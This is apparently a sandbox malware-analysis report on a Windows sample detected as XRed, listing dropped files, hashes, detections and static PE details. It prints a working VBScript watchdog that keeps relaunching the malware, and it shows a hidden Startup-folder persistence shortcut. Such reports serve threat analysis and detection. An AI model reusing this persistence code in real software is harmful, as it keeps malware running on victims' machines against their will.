
Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	Microsoft Excel 2007+
Category:	dropped
Size (bytes):	18387
Entropy (8bit):	7.523057953697544
Encrypted:	false
SSDEEP:	384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
MD5:	E566FC53051035E1E6FD0ED1823DE0F9
SHA1:	00BC96C48B98676ECD67E81A6F1D7754E4156044
SHA-256:	8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
SHA-512:	A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
Malicious:	false
Preview:	PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-c.{...dT.m.kL]Yj.\|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

C:\Users\user\AppData\Local\Temp\WLJOQW.vbs

Download File

Process:	C:\Users\user\Desktop\._cache_FGNEBI.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	838
Entropy (8bit):	5.351462154853889
Encrypted:	false
SSDEEP:	24:dF/UFrkekHU/qaG2b6xI6C6x1xLxeQvJWAB/FVEMPENEZaVx5xCA:f/UFrkek0t+G+7xLxe0WABNVIqZaVzgA
MD5:	C2A442D55F16F7825FA806CF175998D7
SHA1:	BE2268C0D36EF9D5C9565241308B22632E2ECE7C
SHA-256:	93BA79A61734839588641298C6E5CA24B6B36C6E307DFFCAABD56E26088EBE62
SHA-512:	FFF8EF317D8C8995B0AD5D25DB57EEFC7D8E827CFD6EB51CEAB025721C0439B900B2B817964BA971624727E155D46CF74C7FACE8E4C1332F7A1CF99F13D92B79
Malicious:	true
Yara Hits:	Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: C:\Users\user\AppData\Local\Temp\WLJOQW.vbs, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	On error resume next..Dim strComputer,strProcess,fileset..strProcess = "._cache_FGNEBI.exe"..fileset = """C:\Users\user\Desktop\._cache_FGNEBI.exe"""..strComputer = "." ..Dim objShell..Set objShell = CreateObject("WScript.Shell")..Dim fso..Set fso = CreateObject("Scripting.FileSystemObject")..while 1..IF isProcessRunning(strComputer,strProcess) THEN..ELSE..objShell.Run fileset..END IF..Wend..FUNCTION isProcessRunning(BYVAL strComputer,BYVAL strProcessName)..DIM objWMIService, strWMIQuery..strWMIQuery = "Select * from Win32_Process where name like '" & strProcessName & "'"..SET objWMIService = GETOBJECT("winmgmts:" _..& "{impersonationLevel=impersonate}!\\" _ ..& strComputer & "\root\cimv2") ...IF objWMIService.ExecQuery(strWMIQuery).Count > 0 THEN..isProcessRunning = TRUE..ELSE..isProcessRunning = FALSE..END IF..END FUNCTION

C:\Users\user\AppData\Local\Temp\kmu15KX.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.2513646799877
Encrypted:	false
SSDEEP:	24:GgsF+0wFSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+F+pAZewRDK4mW
MD5:	3D6775739DA5F1DEA8BF536850B39659
SHA1:	9E179D1CF6EF52E61A59AAA24DD14CC23D078673
SHA-256:	C29F99DAA6FB1EDCFEB3CB1E2081CE46C2C57F966C8CCF18466E46241075C455
SHA-512:	C30D66B913541F69E5777B0A46B4508131FF2B0389B0B8915F9903281C3615B56E5E41B54A739652D30CAFD8A2F90DA914FA81C33A642B2A2B78FCE47CD5F4AC
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="0tm77pw79VI7dvP8RctlQg">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\~$JUIlYPbf.xlsm

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.5231029153786204
Encrypted:	false
SSDEEP:	3:WH25nJFV:WH2/
MD5:	FB5ABAA34A0BB284B640327B9745AAAC
SHA1:	7E1063A0F1DE0E83424399F104C1D3752BFAECDE
SHA-256:	12464C713EE2E0CBBDCF98FACF8AC034D34A9F4D221D7BB7A5C7D458AAEC0AF9
SHA-512:	0FB235A4475D72D9BB6A195F6DFE471152B91F6DE0967D4174298D0A3C228BFF0ED57F0A5F388833A7793BD90F6CA0D5A974D21D795938D8D96C079AB5D99294
Malicious:	false
Preview:	.user ..h.u.b.e.r.t. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\user\AppData\Local\Temp\~DF1DF269BB4E903A52.TMP

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	3.746897789531007
Encrypted:	false
SSDEEP:	192:QuY+pHkfpPr76TWiu0FPZK3rcd5kM7f+ihdCF3EiRcx+NSt0ckBCecUSaFUH:ZZpEhSTWi/ekfzaVNg0c4gU
MD5:	7426F318A20A187D88A6EC88BBB53BAF
SHA1:	4F2C80834F4B5C9FCF6F4B1D4BF82C9F7CCB92CA
SHA-256:	9AF85C0291203D0F536AA3F4CB7D5FBD4554B331BF4254A6ECD99FE419217830
SHA-512:	EC7BAA93D8E3ACC738883BAA5AEDF22137C26330179164C8FCE7D7F578C552119F58573D941B7BEFC4E6848C0ADEEF358B929A733867923EE31CD2717BE20B80
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WLJOQW.lnk

Download File

Process:	C:\Users\user\Desktop\._cache_FGNEBI.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=4, Archive, ctime=Mon Dec 30 09:34:21 2024, mtime=Mon Dec 30 09:34:21 2024, atime=Mon Dec 30 09:34:21 2024, length=919552, window=hide
Category:	dropped
Size (bytes):	1808
Entropy (8bit):	3.4157462588415863
Encrypted:	false
SSDEEP:	24:8LpsCThFBeMdf1RQAfGF8E2+s9T4IlBIgIIm:8LpbpZ5j1r9MIlLL
MD5:	27EB47881C85D7319B53B6DEC89E9F3F
SHA1:	F3697A7195F5AFC5A8D3A18D6C89C01247786D36
SHA-256:	F13380FCB8928487455036C617A9C6960EAC0361641A3BCBF64456811EC0E606
SHA-512:	ED120531EDB7F3DF176D6A964D697F8F1DB63529C863B7964F1C86AE54BBA409A9812EB67157660E0C91C22301118A15B612D6F40F5BF7A163C18ED75A122C3C
Malicious:	false
Preview:	L..................F.@.. ....Gc.Z..Y.Jc.Z..Y.Jc.Z............................:..DG..Yr?.D..U..k0.&...&.......y.Yd....g.].Z...H.c.Z......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)B.YHT..........................d...A.p.p.D.a.t.a...B.V.1......YFT..Roaming.@......EW)B.YFT..........................h...R.o.a.m.i.n.g.....V.1......YKT..Windata.@......YKT.YKT....U#.....................S0.W.i.n.d.a.t.a.....`.2......YKT .DELPQB.exe..F......YKT.YKT.....)......................T.D.E.L.P.Q.B...e.x.e.......a...............-.......`............^.n.....C:\Users\user\AppData\Roaming\Windata\DELPQB.exe..!.....\.....\.....\.....\.....\.W.i.n.d.a.t.a.\.D.E.L.P.Q.B...e.x.e.*.".C.:.\.U.s.e.r.s.\.h.u.b.e.r.t.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.W.i.n.d.a.t.a.\."...C.:.\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.s.h.e.l.l.3.2...d.l.l.........%SystemRoot%\SysWOW64\shell32.dll............................................................................................................

C:\Users\user\AppData\Roaming\Windata\DELPQB.exe

Download File

Process:	C:\Users\user\Desktop\._cache_FGNEBI.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category:	dropped
Size (bytes):	919552
Entropy (8bit):	7.870873923201665
Encrypted:	false
SSDEEP:	24576:3hloDX0XOf4tHzneKlVLaqueI0psAzrcP39:3hloJfaelV6skAf
MD5:	66A4951D384B55633AB61ADD85514F07
SHA1:	BBF7A65A664BB2B8001576BF670A8381AAD3A185
SHA-256:	6068B17CF1C362BFE7736E0B192C362735A040A68A6D41EB8CCDD8BE242CA191
SHA-512:	D4DC27627BAA28E79AE6DBD375A08C2AFB5D47F43DD1C15E41A5033AC3C95BAD018EBE5087DAFAD62FE2266FA7B69599EC2BED92DA521208AAB5011F854C7123
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 47%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L....>rg.........."......P...........0.......@....@.......................................@...@.......@.....................0...$....@..0...................T........................................2..H...........................................UPX0....................................UPX1.....P.......D..................@....rsrc........@.......H..............@..............................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....

C:\Users\user\Desktop\._cache_FGNEBI.exe

Download File

Process:	C:\Users\user\Desktop\FGNEBI.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category:	dropped
Size (bytes):	919552
Entropy (8bit):	7.870873923201665
Encrypted:	false
SSDEEP:	24576:3hloDX0XOf4tHzneKlVLaqueI0psAzrcP39:3hloJfaelV6skAf
MD5:	66A4951D384B55633AB61ADD85514F07
SHA1:	BBF7A65A664BB2B8001576BF670A8381AAD3A185
SHA-256:	6068B17CF1C362BFE7736E0B192C362735A040A68A6D41EB8CCDD8BE242CA191
SHA-512:	D4DC27627BAA28E79AE6DBD375A08C2AFB5D47F43DD1C15E41A5033AC3C95BAD018EBE5087DAFAD62FE2266FA7B69599EC2BED92DA521208AAB5011F854C7123
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 47%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L....>rg.........."......P...........0.......@....@.......................................@...@.......@.....................0...$....@..0...................T........................................2..H...........................................UPX0....................................UPX1.....P.......D..................@....rsrc........@.......H..............@..............................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....

C:\Users\user\Documents\GAOBCVIQIJ.xlsm

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	Microsoft Excel 2007+
Category:	dropped
Size (bytes):	18387
Entropy (8bit):	7.523057953697544
Encrypted:	false
SSDEEP:	384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
MD5:	E566FC53051035E1E6FD0ED1823DE0F9
SHA1:	00BC96C48B98676ECD67E81A6F1D7754E4156044
SHA-256:	8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
SHA-512:	A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
Malicious:	false
Preview:	PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-c.{...dT.m.kL]Yj.\|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

C:\Users\user\Documents\~$GAOBCVIQIJ.xlsx

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.5231029153786204
Encrypted:	false
SSDEEP:	3:WH25nJFV:WH2/
MD5:	FB5ABAA34A0BB284B640327B9745AAAC
SHA1:	7E1063A0F1DE0E83424399F104C1D3752BFAECDE
SHA-256:	12464C713EE2E0CBBDCF98FACF8AC034D34A9F4D221D7BB7A5C7D458AAEC0AF9
SHA-512:	0FB235A4475D72D9BB6A195F6DFE471152B91F6DE0967D4174298D0A3C228BFF0ED57F0A5F388833A7793BD90F6CA0D5A974D21D795938D8D96C079AB5D99294
Malicious:	false
Preview:	.user ..h.u.b.e.r.t. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\user\Documents\~$cache1

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	771584
Entropy (8bit):	6.632118854531729
Encrypted:	false
SSDEEP:	12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9ITr:ansJ39LyjbJkQFMhmC+6GD98
MD5:	84A6CCB0838DA0E05CC6763275C2EE1C
SHA1:	E2F47601FCAD62183937567210B5062B0750FA70
SHA-256:	5A2B9944F9C900ABFBBF22B605A6D1770FC3C75456FFF3C0517CAA102C5D8F07
SHA-512:	063E5F2432DE4D24E6BE92BD50B0E12E12DDB030615809994EE64551E8D03391C807FEE2D95EACF7669BA816981FA9ABF3A4A7B8574AE0634BEB670F015A031C
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\Documents\~$cache1, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Documents\~$cache1, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 100%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B.....................&....................@.......................... ...................@..............................B...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.372326918237204
Encrypted:	false
SSDEEP:	6144:VFVfpi6ceLP/9skLmb0hyWWSPtaJG8nAge35OlMMhA2AX4WABlguNciL:TV1PyWWI/glMM6kF7qq
MD5:	FC930825E4A7982B3106B9C1E8BAE65D
SHA1:	85577A352D3F4ACECDF9F02BBB8D2918E9B8A6F1
SHA-256:	53297AC2D66CB6EFF1F8F2E3DD0F846D5BAE87F63F48D2BA2A1D667C083B8447
SHA-512:	3FD4262F7A9C17D1316760BBB4D838C447BF9A6DD9EF763CE56A86DE28171B218C6AAA86306B7E21237D502ACE5F1B185FE5B4D58FEF0E9C7EF7DA301902DD02
Malicious:	false
Preview:	regfE...E....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.T#i.Z...............................................................................................................................................................................................................................................................................................................................................T4]........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.465728800629642
TrID:	Win32 Executable (generic) a (10002005/4) 93.09% Win32 Executable Borland Delphi 7 (665061/41) 6.19% UPX compressed Win32 Executable (30571/9) 0.28% Win32 EXE Yoda's Crypter (26571/9) 0.25% Win32 Executable Delphi generic (14689/80) 0.14%
File name:	FGNEBI.exe
File size:	1'691'136 bytes
MD5:	1585cb2963dceb92fbcf6c4c057e191e
SHA1:	2063f45e9c82553bbc41cb4bc8e10b2d06d701c9
SHA256:	67d5fc80b6bf87eb6bc3d505b0102cfdf8e8727d3da004d982467ab08ded7f0b
SHA512:	88475b49d4299519b978711b16e0ea40579a3b671eb898d3d3f8391fbc2de55665bc0a978a20578a4c83f6bf3894a857e4013f34b0e2e4db6de404f66ef9ce47
SSDEEP:	24576:gnsJ39LyjbJkQFMhmC+6GD9YhloDX0XOf4tHzneKlVLaqueI0psAzrcP39h:gnsHyjtk2MYC5GDyhloJfaelV6skAfX
TLSH:	6D75C02EB2918436E137D6F84F5BB264582BBFF12F25694A3BE43E4C4E3927128151D3
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	0759fdf4f859738f

Static PE Info

General

Entrypoint:	0x49ab80
Entrypoint Section:	CODE
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	332f7ce65ead0adfb3d35147033aabe9

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
mov eax, 0049A778h
call 00007F06B079DC8Dh
mov eax, dword ptr [0049DBCCh]
mov eax, dword ptr [eax]
call 00007F06B07F15D5h
mov eax, dword ptr [0049DBCCh]
mov eax, dword ptr [eax]
mov edx, 0049ABE0h
call 00007F06B07F11D4h
mov ecx, dword ptr [0049DBDCh]
mov eax, dword ptr [0049DBCCh]
mov eax, dword ptr [eax]
mov edx, dword ptr [00496590h]
call 00007F06B07F15C4h
mov eax, dword ptr [0049DBCCh]
mov eax, dword ptr [eax]
call 00007F06B07F1638h
call 00007F06B079B76Bh
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa0000	0x2a42	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xb0000	0xf2530	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xa5000	0xa980	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0xa4018	0x21	.rdata
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xa4000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
CODE	0x1000	0x99bec	0x99c00	33fbe30e8a64654287edd1bf05ae7c8c	False	0.5141641260162602	data	6.572957870355296	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA	0x9b000	0x2e54	0x3000	1f5e19e7d20c1d128443d738ac7bc610	False	0.453125	data	4.854620797809023	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS	0x9e000	0x11e5	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0xa0000	0x2a42	0x2c00	21ff53180b390dc06e3a1adf0e57a073	False	0.3537819602272727	data	4.919333216027082	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0xa3000	0x10	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0xa4000	0x39	0x200	a92cf494c617731a527994013429ad97	False	0.119140625	MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "J"	0.7846201577093705	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc	0xa5000	0xa980	0xaa00	dcd1b1c3f3d28d444920211170d1e8e6	False	0.5899816176470588	data	6.674124985579511	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc	0xb0000	0xf2530	0xf2600	8a289c0cf2c2e66f01330fe7458e336a	False	0.8940920738782878	data	7.780762560557007	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0xb0dc8	0x134	Targa image data - Map 64 x 65536 x 1 +32 "\001"			0.38636363636363635
RT_CURSOR	0xb0efc	0x134	data			0.4642857142857143
RT_CURSOR	0xb1030	0x134	data			0.4805194805194805
RT_CURSOR	0xb1164	0x134	data			0.38311688311688313
RT_CURSOR	0xb1298	0x134	data			0.36038961038961037
RT_CURSOR	0xb13cc	0x134	data			0.4090909090909091
RT_CURSOR	0xb1500	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"			0.4967532467532468
RT_BITMAP	0xb1634	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.43103448275862066
RT_BITMAP	0xb1804	0x1e4	Device independent bitmap graphic, 36 x 19 x 4, image size 380			0.46487603305785125
RT_BITMAP	0xb19e8	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.43103448275862066
RT_BITMAP	0xb1bb8	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.39870689655172414
RT_BITMAP	0xb1d88	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.4245689655172414
RT_BITMAP	0xb1f58	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.5021551724137931
RT_BITMAP	0xb2128	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.5064655172413793
RT_BITMAP	0xb22f8	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.39655172413793105
RT_BITMAP	0xb24c8	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.5344827586206896
RT_BITMAP	0xb2698	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.39655172413793105
RT_BITMAP	0xb2868	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128			0.4870689655172414
RT_ICON	0xb2950	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096			0.1472795497185741
RT_ICON	0xb39f8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 8192	Turkish	Turkey	0.2101313320825516
RT_DIALOG	0xb4aa0	0x52	data			0.7682926829268293
RT_STRING	0xb4af4	0x358	data			0.3796728971962617
RT_STRING	0xb4e4c	0x428	data			0.37406015037593987
RT_STRING	0xb5274	0x3a4	data			0.40879828326180256
RT_STRING	0xb5618	0x3bc	data			0.33472803347280333
RT_STRING	0xb59d4	0x2d4	data			0.4654696132596685
RT_STRING	0xb5ca8	0x334	data			0.42804878048780487
RT_STRING	0xb5fdc	0x42c	data			0.42602996254681647
RT_STRING	0xb6408	0x1f0	data			0.4213709677419355
RT_STRING	0xb65f8	0x1c0	data			0.44419642857142855
RT_STRING	0xb67b8	0xdc	data			0.6
RT_STRING	0xb6894	0x320	data			0.45125
RT_STRING	0xb6bb4	0xd8	data			0.5879629629629629
RT_STRING	0xb6c8c	0x118	data			0.5678571428571428
RT_STRING	0xb6da4	0x268	data			0.4707792207792208
RT_STRING	0xb700c	0x3f8	data			0.37598425196850394
RT_STRING	0xb7404	0x378	data			0.41103603603603606
RT_STRING	0xb777c	0x380	data			0.35379464285714285
RT_STRING	0xb7afc	0x374	data			0.4061085972850679
RT_STRING	0xb7e70	0xe0	data			0.5535714285714286
RT_STRING	0xb7f50	0xbc	data			0.526595744680851
RT_STRING	0xb800c	0x368	data			0.40940366972477066
RT_STRING	0xb8374	0x3fc	data			0.34901960784313724
RT_STRING	0xb8770	0x2fc	data			0.36649214659685864
RT_STRING	0xb8a6c	0x354	data			0.31572769953051644
RT_RCDATA	0xb8dc0	0x44	data			0.8676470588235294
RT_RCDATA	0xb8e04	0x10	data			1.5
RT_RCDATA	0xb8e14	0xe0800	PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed			0.9261314205178174
RT_RCDATA	0x199614	0x3	ASCII text, with no line terminators	Turkish	Turkey	3.6666666666666665
RT_RCDATA	0x199618	0x3c00	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	Turkish	Turkey	0.54296875
RT_RCDATA	0x19d218	0x64c	data			0.5998759305210918
RT_RCDATA	0x19d864	0x153	Delphi compiled form 'TFormVir'			0.7522123893805309
RT_RCDATA	0x19d9b8	0x47d3	Microsoft Excel 2007+	Turkish	Turkey	0.8675150921846957
RT_GROUP_CURSOR	0x1a218c	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.25
RT_GROUP_CURSOR	0x1a21a0	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.25
RT_GROUP_CURSOR	0x1a21b4	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0x1a21c8	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0x1a21dc	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0x1a21f0	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0x1a2204	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_ICON	0x1a2218	0x14	data	Turkish	Turkey	1.1
RT_VERSION	0x1a222c	0x304	data	Turkish	Turkey	0.42875647668393785

Imports

DLL	Import
kernel32.dll	DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryA, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCurrentDirectoryA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, ExitThread, CreateThread, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
user32.dll	GetKeyboardType, LoadStringA, MessageBoxA, CharNextA
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
kernel32.dll	TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
advapi32.dll	RegSetValueExA, RegQueryValueExA, RegOpenKeyExA, RegNotifyChangeKeyValue, RegFlushKey, RegDeleteValueA, RegCreateKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA, GetUserNameA, AdjustTokenPrivileges
